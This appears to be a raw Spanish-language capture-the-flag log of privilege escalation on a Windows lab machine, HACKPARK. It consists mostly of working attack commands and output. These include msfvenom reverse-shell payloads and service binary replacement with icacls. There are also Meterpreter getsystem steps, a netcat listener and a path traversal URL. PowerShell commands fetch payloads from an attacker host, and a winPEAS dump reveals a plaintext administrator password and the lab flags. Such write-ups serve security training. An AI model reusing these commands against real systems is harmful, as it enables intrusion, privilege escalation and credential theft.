08/31/2003 11:06 AM 80,856 ding.wav
01/26/2024 08:44 PM <DIR> Events
08/04/2019 03:36 AM 60 Forum.url
01/08/2009 07:21 PM 1,637,972 libeay32.dll
11/15/2004 11:16 PM 9,813 License.txt
01/26/2024 07:36 PM 1,496 LogFile.txt
01/26/2024 07:37 PM 3,760 LogfileAdvanced.txt
03/25/2018 09:58 AM 536,992 Message.exe
03/25/2018 09:59 AM 445,344 PlaySound.exe
03/25/2018 09:58 AM 27,040 PlayWAV.exe
08/04/2019 02:05 PM 149 Preferences.ini
03/25/2018 09:58 AM 485,792 Privilege.exe
03/24/2018 11:09 AM 10,100 ReadMe.txt
03/25/2018 09:58 AM 112,544 RunNow.exe
03/25/2018 09:59 AM 40,352 sc32.exe
08/31/2003 11:06 AM 766 schedule.ico
03/25/2018 09:58 AM 1,633,696 Scheduler.exe
03/25/2018 09:59 AM 491,936 SendKeysHelper.exe
03/25/2018 09:58 AM 437,664 ShowXY.exe
03/25/2018 09:58 AM 439,712 ShutdownGUI.exe
03/25/2018 09:58 AM 235,936 SSAdmin.exe
03/25/2018 09:58 AM 731,552 SSCmd.exe
01/08/2009 07:12 PM 355,446 ssleay32.dll
03/25/2018 09:58 AM 456,608 SSMail.exe
08/04/2019 03:36 AM 6,999 unins000.dat
08/04/2019 03:36 AM 722,597 unins000.exe
08/04/2019 03:36 AM 54 Website.url
06/26/2009 04:27 PM 6,574 whiteclock.ico
03/25/2018 09:58 AM 76,704 WhoAmI.exe
05/16/2006 03:49 PM 785,042 WSCHEDULER.CHM
05/16/2006 02:58 PM 2,026 WScheduler.cnt
03/25/2018 09:58 AM 331,168 WScheduler.exe
05/16/2006 03:58 PM 703,081 WSCHEDULER.HLP
03/25/2018 09:58 AM 136,096 WSCtrl.exe
03/25/2018 09:58 AM 98,720 WService.exe.bkp
03/25/2018 09:58 AM 68,512 WSLogon.exe
03/25/2018 09:59 AM 33,184 WSProc.dll
38 File(s) 11,148,259 bytes
3 Dir(s) 39,128,014,848 bytes free
LLEVAMOS NUESTRO PAYLOAD DE REVERSE SHELL CREADO CON MSFVENOM AL DIRECTORIO DEL SERVICIO:
move C:\Windows\Temp\rev-svc.exe WService.exe
C:\PROGRA~2\SYSTEM~1>move C:\Windows\Temp\rev-svc.exe WService.exe
1 file(s) moved.
dir
C:\PROGRA~2\SYSTEM~1>dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\PROGRA~2\SYSTEM~1
01/26/2024 08:48 PM <DIR> .
01/26/2024 08:48 PM <DIR> ..
05/17/2007 12:47 PM 1,150 alarmclock.ico
08/31/2003 11:06 AM 766 clock.ico
08/31/2003 11:06 AM 80,856 ding.wav
01/26/2024 08:47 PM <DIR> Events
08/04/2019 03:36 AM 60 Forum.url
01/08/2009 07:21 PM 1,637,972 libeay32.dll
11/15/2004 11:16 PM 9,813 License.txt
01/26/2024 07:36 PM 1,496 LogFile.txt
01/26/2024 07:37 PM 3,760 LogfileAdvanced.txt
03/25/2018 09:58 AM 536,992 Message.exe
03/25/2018 09:59 AM 445,344 PlaySound.exe
03/25/2018 09:58 AM 27,040 PlayWAV.exe
08/04/2019 02:05 PM 149 Preferences.ini
03/25/2018 09:58 AM 485,792 Privilege.exe
03/24/2018 11:09 AM 10,100 ReadMe.txt
03/25/2018 09:58 AM 112,544 RunNow.exe
03/25/2018 09:59 AM 40,352 sc32.exe
08/31/2003 11:06 AM 766 schedule.ico
03/25/2018 09:58 AM 1,633,696 Scheduler.exe
03/25/2018 09:59 AM 491,936 SendKeysHelper.exe
03/25/2018 09:58 AM 437,664 ShowXY.exe
03/25/2018 09:58 AM 439,712 ShutdownGUI.exe
03/25/2018 09:58 AM 235,936 SSAdmin.exe
03/25/2018 09:58 AM 731,552 SSCmd.exe
01/08/2009 07:12 PM 355,446 ssleay32.dll
03/25/2018 09:58 AM 456,608 SSMail.exe
08/04/2019 03:36 AM 6,999 unins000.dat
08/04/2019 03:36 AM 722,597 unins000.exe
08/04/2019 03:36 AM 54 Website.url
06/26/2009 04:27 PM 6,574 whiteclock.ico
03/25/2018 09:58 AM 76,704 WhoAmI.exe
05/16/2006 03:49 PM 785,042 WSCHEDULER.CHM
05/16/2006 02:58 PM 2,026 WScheduler.cnt
03/25/2018 09:58 AM 331,168 WScheduler.exe
05/16/2006 03:58 PM 703,081 WSCHEDULER.HLP
03/25/2018 09:58 AM 136,096 WSCtrl.exe
01/26/2024 08:43 PM 48,640 WService.exe
03/25/2018 09:58 AM 98,720 WService.exe.bkp
03/25/2018 09:58 AM 68,512 WSLogon.exe
03/25/2018 09:59 AM 33,184 WSProc.dll
39 File(s) 11,196,899 bytes
3 Dir(s) 39,127,986,176 bytes free
DAMOS LOS FULL PRIVILEGIOS AL PAYLOAD:
icacls WService.exe /grant Everyone:F
PARAMOS EL SERVICIO PARA QUE SE REINICIE Y LO EJECUTAMOS Y ESPAREMAOS LA SHELL CON PRIVILEGIOS DE SYSTEM EN NETCAT:
sc stop WindowsScheduler
sc start WindowsScheduler
PERMISO DENEGADO
meterpreter > execute -f cmd -c "sc stop WindowsScheduler"
meterpreter > execute -f cmd -c "sc start WindowsScheduler"
NO FUNCIONO VAMOS A PROVAR MODIFICANDO EL ARCHIVO MESAGE.EXE:!!!!
move Message.exe Message.exe.bkp
C:\PROGRA~2\SYSTEM~1>move Message.exe Message.exe.bkp
1 file(s) moved.
move WService.exe Message.exe
C:\PROGRA~2\SYSTEM~1>move WService.exe Message.exe
1 file(s) moved.
move WService.exe.bkp WService.exe
C:\PROGRA~2\SYSTEM~1>move WService.exe.bkp WService.exe
1 file(s) moved.
icacls Message.exe /grant Everyone:F
TAMPOCO FUNCIONO NO NOS DEJA PERMISOSO!!!!!
icacls rev-svc.exe /grant Everyone:F
sc config WindowsScheduler binPath= "C:\Windows\Temp\rev-svc.exe" obj= LocalSystem
TAMPOCO FUNCIONO NO NOS DEJA PERMISOSO!!!!!
ESTAMOS A LA ESCUCHA POR EL PUERTO 443 PARA QUE EL PAYLOAD NOS DEVUELVA LA EJECUCION DE LA SHEEL CON LOS PRIVILEGIOS DE LOCALL SYSTEM QUE ES QUIEN EJECUTA EL SERVICIO ORIGINAL:
┌──(root㉿kali)-[~]
└─# nc -lnvp 443
listening on [any] 443 ...
NO TUVIMOS EXITO EN ESTOS INTENTOS; VAMOS A VER SI PODEMOS ASER ABUSO DE PRIVILEGIOS DE IMPERSONATE:
SERVICE_NAME: WinRM
DISPLAY_NAME: Windows Remote Management (WS-Management)
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\Windows\Temp>sc qc WinRM
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WinRM
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\System32\svchost.exe -k NetworkService
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Windows Remote Management (WS-Management)
DEPENDENCIES : RPCSS
: HTTP
SERVICE_START_NAME : NT AUTHORITY\NetworkService
NO FUNCIONO...!!!!!!!!
*********************************** SYSTEM ******************
PROVAMOS CON EL COMANDO DE ELEVADA DE PRIVILEGIOS DE METERPRETER Y BINGO ESTARIAMOS COMO SYSTEM USO EL METODO 5:
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > sysinfo
Computer : HACKPARK
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
---
DEFRAGMENTAMOS EL METODO 5 QUE USO GETSYSTEM PARA ESCALAR PRIVILEGIOS AUTOMATICAMENTE CON ESTE COMANDO DE METERPRETER, APROBECHIO UNA VULNERABILIDAD DE ESCALADA DE ESTE SERVICIO CONSULTANDOLO CON GPT:
SERVICE_NAME: Spooler
DISPLAY_NAME: Print Spooler
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
c:\windows\system32\inetsrv>sc qc Spooler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Spooler
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\System32\spoolsv.exe
LOAD_ORDER_GROUP : SpoolerGroup
TAG : 0
DISPLAY_NAME : Print Spooler
DEPENDENCIES : RPCSS
: http
SERVICE_START_NAME : LocalSystem
C:\Windows\System32\spoolsv.exe NT SERVICE\TrustedInstaller:(F)
BUILTIN\Administrators:(RX)
NT AUTHORITY\SYSTEM:(RX)
BUILTIN\Users:(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
BANDERA DE JEFF:
meterpreter > cd Users
meterpreter > ls
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 8192 dir 2019-08-03 18:15:04 +0000 .NET v4.5
040777/rwxrwxrwx 8192 dir 2019-08-03 18:15:04 +0000 .NET v4.5 Classic
040777/rwxrwxrwx 8192 dir 2019-08-05 21:03:44 +0000 Administrator
040777/rwxrwxrwx 0 dir 2013-08-22 14:48:41 +0000 All Users
040555/r-xr-xr-x 8192 dir 2014-03-21 19:16:56 +0000 Default
040777/rwxrwxrwx 0 dir 2013-08-22 14:48:41 +0000 Default User
040555/r-xr-xr-x 4096 dir 2013-08-22 15:39:32 +0000 Public
100666/rw-rw-rw- 174 fil 2013-08-22 15:37:57 +0000 desktop.ini
040777/rwxrwxrwx 8192 dir 2019-08-04 18:54:53 +0000 jeff
meterpreter > cd jeff
meterpreter > ls
Listing: C:\Users\jeff
======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 AppData
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 Application Data
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Contacts
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 Cookies
040555/r-xr-xr-x 0 dir 2019-08-04 18:55:14 +0000 Desktop
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Documents
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Downloads
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Favorites
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Links
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 Local Settings
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Music
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 My Documents
100666/rw-rw-rw- 524288 fil 2024-01-27 03:47:12 +0000 NTUSER.DAT
100666/rw-rw-rw- 65536 fil 2019-08-04 18:57:22 +0000 NTUSER.DAT{3a3c0b2d-b123-11e3-80ba-a4badb27b52d}.TM
.blf
100666/rw-rw-rw- 524288 fil 2019-08-04 18:57:22 +0000 NTUSER.DAT{3a3c0b2d-b123-11e3-80ba-a4badb27b52d}.TM
Container00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2019-08-04 18:57:22 +0000 NTUSER.DAT{3a3c0b2d-b123-11e3-80ba-a4badb27b52d}.TM
Container00000000000000000002.regtrans-ms
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 NetHood
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Pictures
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 PrintHood
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 Recent
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Saved Games
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Searches
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 SendTo
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 Start Menu
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 Templates
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Videos
100666/rw-rw-rw- 274432 fil 2019-08-04 18:54:52 +0000 ntuser.dat.LOG1
100666/rw-rw-rw- 98304 fil 2019-08-04 18:54:52 +0000 ntuser.dat.LOG2
100666/rw-rw-rw- 20 fil 2019-08-04 18:54:52 +0000 ntuser.ini
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\jeff\Desktop
==============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-08-04 18:54:53 +0000 desktop.ini
100666/rw-rw-rw- 32 fil 2019-08-04 18:57:10 +0000 user.txt
meterpreter > cat user.txt
759bd8af507517bcfaede78a21a73e39
BANDERA DE ADMINISTRADOR ROOT:
meterpreter > pwd
C:\Users
meterpreter > ls
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 8192 dir 2019-08-03 18:15:04 +0000 .NET v4.5
040777/rwxrwxrwx 8192 dir 2019-08-03 18:15:04 +0000 .NET v4.5 Classic
040777/rwxrwxrwx 8192 dir 2019-08-05 21:03:44 +0000 Administrator
040777/rwxrwxrwx 0 dir 2013-08-22 14:48:41 +0000 All Users
040555/r-xr-xr-x 8192 dir 2014-03-21 19:16:56 +0000 Default
040777/rwxrwxrwx 0 dir 2013-08-22 14:48:41 +0000 Default User
040555/r-xr-xr-x 4096 dir 2013-08-22 15:39:32 +0000 Public
100666/rw-rw-rw- 174 fil 2013-08-22 15:37:57 +0000 desktop.ini
040777/rwxrwxrwx 8192 dir 2019-08-04 18:54:53 +0000 jeff
meterpreter > cd Administrator
meterpreter > ls
Listing: C:\Users\Administrator
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 AppData
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 Application Data
040555/r-xr-xr-x 0 dir 2019-08-03 17:43:54 +0000 Contacts
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 Cookies
040555/r-xr-xr-x 0 dir 2019-08-04 18:49:15 +0000 Desktop
040555/r-xr-xr-x 4096 dir 2019-08-03 17:43:54 +0000 Documents
040555/r-xr-xr-x 4096 dir 2020-10-02 21:38:28 +0000 Downloads
040555/r-xr-xr-x 0 dir 2019-08-03 17:43:54 +0000 Favorites
040555/r-xr-xr-x 0 dir 2019-08-03 17:43:54 +0000 Links
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 Local Settings
040555/r-xr-xr-x 0 dir 2019-08-03 17:43:54 +0000 Music
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 My Documents
100666/rw-rw-rw- 524288 fil 2020-10-02 22:10:58 +0000 NTUSER.DAT
100666/rw-rw-rw- 65536 fil 2019-08-03 17:43:51 +0000 NTUSER.DAT{3a3c0b2d-b123-11e3-80ba-a4badb27b52d}.TM
.blf
100666/rw-rw-rw- 524288 fil 2019-08-03 17:43:51 +0000 NTUSER.DAT{3a3c0b2d-b123-11e3-80ba-a4badb27b52d}.TM
Container00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2019-08-03 17:43:51 +0000 NTUSER.DAT{3a3c0b2d-b123-11e3-80ba-a4badb27b52d}.TM
Container00000000000000000002.regtrans-ms
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 NetHood
040555/r-xr-xr-x 0 dir 2019-08-03 17:43:54 +0000 Pictures
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 PrintHood
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 Recent
040555/r-xr-xr-x 0 dir 2019-08-03 17:43:54 +0000 Saved Games
040555/r-xr-xr-x 0 dir 2019-08-03 17:43:54 +0000 Searches
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 SendTo
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 Start Menu
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 Templates
040555/r-xr-xr-x 0 dir 2019-08-03 17:43:54 +0000 Videos
100666/rw-rw-rw- 839680 fil 2019-08-03 17:43:51 +0000 ntuser.dat.LOG1
100666/rw-rw-rw- 835584 fil 2019-08-03 17:43:51 +0000 ntuser.dat.LOG2
100666/rw-rw-rw- 20 fil 2019-08-03 17:43:51 +0000 ntuser.ini
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 1029 fil 2019-08-04 11:36:42 +0000 System Scheduler.lnk
100666/rw-rw-rw- 282 fil 2019-08-03 17:43:54 +0000 desktop.ini
100666/rw-rw-rw- 32 fil 2019-08-04 18:51:42 +0000 root.txt
meterpreter > cat root.txt
7e13d97f05f7ceb9881a3eb3d78d3e72
------------
TAMBIEN YA CON ESTOS PRIVILEGIOS PUDIMOS EXPLOTAR EL SERVICIO WINDOWSCHELUDER STOPEADNOS Y DANDOLES START AL SERVIO AHORA :
C:\Windows\System32>sc stop WindowsScheduler
sc stop WindowsScheduler
SERVICE_NAME: WindowsScheduler
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x2
WAIT_HINT : 0x3e8
C:\Windows\System32>sc start WindowsScheduler
sc start WindowsScheduler
SERVICE_NAME: WindowsScheduler
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 3308
FLAGS :
┌──(root㉿kali)-[~]
└─# nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.82.143] from (UNKNOWN) [10.10.123.185] 49409
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
////// BORRADOR NO PRESTAR ATENCION //////
QUEDA PENDIENTE HACER ESTOS PASOS SOBRE ALGUNOS DE LOS DOS BINARIOS VEEEEER :
////////
user@attackerpc$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe
user@attackerpc$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Luego podemos extraer la carga útil de Powershell con el siguiente comando:
Potencia Shell
wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe
Una vez que la carga útil está en el servidor de Windows, procedemos a reemplazar el ejecutable del servicio con nuestra carga útil. Dado que necesitamos otro usuario para ejecutar nuestra carga útil, también queremos otorgar permisos completos al grupo Todos:
Símbolo del sistema
C:\> cd C:\PROGRA~2\SYSTEM~1\
C:\PROGRA~2\SYSTEM~1> move WService.exe WService.exe.bkp
1 file(s) moved.
C:\PROGRA~2\SYSTEM~1> move C:\Users\thm-unpriv\rev-svc.exe WService.exe
1 file(s) moved.
C:\PROGRA~2\SYSTEM~1> icacls WService.exe /grant Everyone:F
Successfully processed 1 files.
Iniciamos un detector inverso en nuestra máquina atacante:
KaliLinux
user@attackerpc$ nc -lvp 4445
Y finalmente, reinicie el servicio. Si bien en un escenario normal, probablemente tendría que esperar a que se reinicie el servicio, se le han asignado privilegios para reiniciar el servicio usted mismo para ahorrarle algo de tiempo. Utilice los siguientes comandos desde el símbolo del sistema cmd.exe:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe
///////////
ESCALADA DE PRIVILEGIOS SIN METASPLOIT:
http://10.10.123.185/?theme=../../App_Data/files
CREAMOS UN PAYLOAD CON MSFVENOM Y LUEGO CARGAMOS EL ARCHIVO EN LA MAQUINA VICTIMA:
┌──(root㉿kali)-[~/Downloads]
└─# python3 -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
10.10.123.185 - - [27/Jan/2024 07:18:31] "GET /shellpaimonX.exe HTTP/1.1" 200 -
10.10.123.185 - - [27/Jan/2024 07:22:06] "GET /winPEAS.bat HTTP/1.1" 200 -
powershell -c "Invoke-WebRequest -Uri 'ip/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
LO CARGAMOS EN LA MAQUINA EN DIRECTORIO TEMP CON COMANDO DE POWERSHELL:
C:\Windows\Temp>powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.123.234:8081/shellpaimonX.exe','shellpaimonX.exe')"
dir
C:\Windows\Temp>dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\Windows\Temp
01/26/2024 11:18 PM <DIR> .
01/26/2024 11:18 PM <DIR> ..
08/06/2019 01:13 PM 8,795 Amazon_SSM_Agent_20190806141239.log
08/06/2019 01:13 PM 181,468 Amazon_SSM_Agent_20190806141239_000_AmazonSSMAgentMSI.log
08/06/2019 01:13 PM 1,206 cleanup.txt
08/06/2019 01:13 PM 421 cmdout
08/06/2019 01:11 PM 0 DMI2EBC.tmp
08/03/2019 09:43 AM 0 DMI4D21.tmp
08/06/2019 01:12 PM 8,743 EC2ConfigService_20190806141221.log
08/06/2019 01:12 PM 292,438 EC2ConfigService_20190806141221_000_WiXEC2ConfigSetup_64.log
01/26/2024 08:15 PM <DIR> Microsoft
01/26/2024 09:19 PM 48,640 rev-svc.exe
01/26/2024 08:15 PM 250,880 shellpaimon.exe
01/26/2024 11:18 PM 73,802 shellpaimonX.exe
08/06/2019 01:13 PM 21 stage1-complete.txt
08/06/2019 01:13 PM 28,495 stage1.txt
05/12/2019 08:03 PM 113,328 svcexec.exe
08/06/2019 01:13 PM 67 tmp.dat
01/26/2024 09:48 PM 69,175 windows-exploit-suggester.py
16 File(s) 1,077,479 bytes
3 Dir(s) 39,126,925,312 bytes free
CARGAMOS WINPEAS PARA LA ENUMERACION EN LA MAQUINA:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.123.234:8081/winPEAS.bat','winPEAS.bat')"
C:\Windows\Temp>powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.123.234:8081/winPEAS.bat','winPEAS.bat')"
dir
C:\Windows\Temp>dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\Windows\Temp
01/26/2024 11:22 PM <DIR> .
01/26/2024 11:22 PM <DIR> ..
08/06/2019 01:13 PM 8,795 Amazon_SSM_Agent_20190806141239.log
08/06/2019 01:13 PM 181,468 Amazon_SSM_Agent_20190806141239_000_AmazonSSMAgentMSI.log
08/06/2019 01:13 PM 1,206 cleanup.txt
08/06/2019 01:13 PM 421 cmdout
08/06/2019 01:11 PM 0 DMI2EBC.tmp
08/03/2019 09:43 AM 0 DMI4D21.tmp
08/06/2019 01:12 PM 8,743 EC2ConfigService_20190806141221.log
08/06/2019 01:12 PM 292,438 EC2ConfigService_20190806141221_000_WiXEC2ConfigSetup_64.log
01/26/2024 08:15 PM <DIR> Microsoft
01/26/2024 09:19 PM 48,640 rev-svc.exe
01/26/2024 08:15 PM 250,880 shellpaimon.exe
01/26/2024 11:18 PM 73,802 shellpaimonX.exe
08/06/2019 01:13 PM 21 stage1-complete.txt
08/06/2019 01:13 PM 28,495 stage1.txt
05/12/2019 08:03 PM 113,328 svcexec.exe
08/06/2019 01:13 PM 67 tmp.dat
01/26/2024 09:48 PM 69,175 windows-exploit-suggester.py
01/26/2024 11:22 PM 35,515 winPEAS.bat
17 File(s) 1,112,994 bytes
3 Dir(s) 39,126,888,448 bytes free
EJECUTAMOS WINPEAS :
C:\Windows\Temp>.\winPEAS.bat
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
[+] GPP Password
[+] Cloud Credentials
[+] AppCmd
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
C:\Windows\system32\inetsrv\appcmd.exe exists.
[+] Files in registry that may contain credentials
[i] Searching specific files that may contains credentials.
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
LastUsedUsername REG_SZ administrator
DefaultUserName REG_SZ administrator
DefaultPassword REG_SZ 4q6XvFES7Fdxs
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
W3SVC REG_SZ Software\Microsoft\W3SVC\CurrentVersion
Looking inside HKCU\Software\TightVNC\Server
Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
Looking inside HKCU\Software\OpenSSH\Agent\Keys
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\ProgramData\Amazon\EC2Launch\sysprep\unattend.xml
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\Users\All Users\Amazon\EC2Launch\sysprep\unattend.xml
C:\Windows\Panther\setupinfo
C:\Windows\System32\inetsrv\appcmd.exe
C:\Windows\SysWOW64\inetsrv\appcmd.exe
C:\Windows\WinSxS\amd64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_64e8a179c6f2a167\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_824aabe06aee1705\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_microsoft-windows-d..rvices-domain-files_31bf3856ad364e35_6.3.9600.16384_none_8bc96e4517571480\ntds.dit
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_01a7d2cf88c95dc0\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_01dac51388a3a832\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-webenroll.resources_31bf3856ad364e35_6.3.9600.16384_en-us_7427d216367d8d3f\certnew.cer
C:\Windows\WinSxS\wow64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_6f3d4bcbfb536362\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_8c9f56329f4ed900\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_0bfc7d21bd2a1fbb\appcmd.exe
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_0c2f6f65bd046a2d\appcmd.exe
C:\inetpub\wwwroot\Web.config
C:\inetpub\wwwroot\Account\Web.Config
C:\inetpub\wwwroot\admin\Web.Config
C:\inetpub\wwwroot\admin\app\editor\Web.Config
C:\inetpub\wwwroot\setup\Web.config
---
Scan complete.
dir
,/*,..*(((((((((((((((((((((((((((((((((,
C:\inetpub\temp\appPools\Blog\Blog.config
C:\inetpub\temp\appPools\DefaultAppPool\DefaultAppPool.config
C:\inetpub\wwwroot\packages.config
C:\inetpub\wwwroot\Web.config
C:\inetpub\wwwroot\Account\change-password-success.aspx
C:\inetpub\wwwroot\Account\change-password.aspx
C:\inetpub\wwwroot\Account\password-retrieval.aspx
C:\inetpub\wwwroot\Account\Web.Config
C:\inetpub\wwwroot\admin\Web.Config
C:\inetpub\wwwroot\admin\app\editor\Web.Config
C:\inetpub\wwwroot\Content\images\blog\icon-pass.svg
C:\inetpub\wwwroot\setup\Web.config
C:\inetpub\wwwroot\setup\MySQL\MySQLWeb.Config
C:\inetpub\wwwroot\setup\MySQL\Archive\MySQLWeb.Config
C:\inetpub\wwwroot\setup\SQLite\SQLiteWeb.Config
C:\inetpub\wwwroot\setup\SQLServer\DbWeb.Config
C:\inetpub\wwwroot\setup\SQL_CE\SQL_CE_Web.Config
C:\Program Files\Amazon\Ec2ConfigService\ScramblePassword.exe
C:\Program Files\Amazon\Ec2ConfigService\ScramblePassword.exe.config
C:\Program Files\Amazon\Ec2ConfigService\ec2config-cli.exe.config
C:\Program Files\Amazon\Ec2ConfigService\ec2config-cli.log4net.config
C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe.config
C:\Program Files\Amazon\Ec2ConfigService\Ec2ConfigMonitor.exe.config
